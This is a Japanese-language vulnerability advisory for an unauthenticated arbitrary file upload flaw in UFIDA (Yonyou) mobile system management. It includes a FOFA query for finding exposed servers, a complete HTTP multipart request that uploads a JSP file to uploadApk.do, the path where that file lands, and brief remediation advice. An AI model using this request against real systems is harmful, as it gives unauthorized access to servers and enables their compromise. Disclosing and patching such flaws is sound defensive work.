0x01 製品紹介
UFIDA モバイル システム管理は、企業のモバイル オフィスの実現、経営効率の向上、スタッフの勤務の柔軟性の向上を目的として、UFIDA が開始したモバイル オフィス ソリューションです。ユーザーがモバイル デバイス上でエンタープライズ システムやビジネスを管理および処理できるようにするための一連の機能とツールを提供します。
0x02 脆弱性の概要
UFIDA モバイル管理システムの UploadApk.do インターフェイスには任意のファイルがアップロードされる脆弱性があり、権限のない攻撃者がこの脆弱性を利用して任意のファイルをアップロードし、最終的にはサーバーの権限を取得する可能性があります。
0x03 再発環境
FOFA: app="Yonyou-モバイル システム管理"
0x04 脆弱性の再発
実証実験
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
PS: 返されるステータス コードは 2 でなければなりません。他のステータス コードは受け入れられません。
URLを確認してください
http://your-ip/maupload/apk/a.jsp
0x05 修復の提案
インターネットに公開されたサーフェスを閉じるか、インターフェイスのアクセス許可を設定してください
安全なバージョンにアップグレードする